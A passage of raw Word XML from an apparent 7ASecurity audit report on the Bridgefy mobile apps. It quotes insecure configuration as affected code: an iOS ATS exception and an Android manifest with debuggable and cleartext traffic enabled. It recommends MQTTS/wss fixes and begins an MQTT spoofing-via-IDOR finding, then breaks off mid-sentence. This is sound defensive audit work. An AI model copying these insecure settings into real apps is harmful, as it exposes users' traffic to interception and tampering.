      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NSAllowsArbitraryLoadsInWebContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(Android):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/app/src/main/AndroidManifest.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(Android):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;application </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>theme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@style/Theme.BridgefyApp"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@string/app_launcher_name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@mipmap/ic_launcher" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.main.App" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>debuggable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>allowBackup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"false"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>logo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@drawable/ic_bridgefy" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>hardwareAccelerated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"true" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>supportsRtl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fullBackupContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"false" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>usesCleartextTraffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>appComponentFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"androidx.core.app.CoreComponentFactory"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to move away from all clear-text protocols, such as MQTT. Instead, the apps should utilize MQTTS, which is MQTT over TLS, and will protect the integrity and confidentiality of MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>communications.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>may</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accomplished</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>establishing WebSockets over TLS, using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>wss:// </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>instead of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ws:// </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>URLs on both apps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="371"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Once this is done, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>usesCleartextTraffic </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>flag should be set to false in the Android Manifest, and all ATS exceptions should be removed on the iOS app. This will ensure the mobile platforms prevent clear-text traffic by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After this, a nightly job or commit hook could automatically scan the source code for clear-text URLs. The purpose of this would be to alert administrators when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>occur, which will drastically reduce the odds of similar problems in the future.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250048" w:id="7"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-014</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1/3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Arbitrary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Spoofing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>IDOR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="376"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy partially fixed this issue and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>verified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is valid. Implementation of the remaining hardening guidance is ongoing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>manipulated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
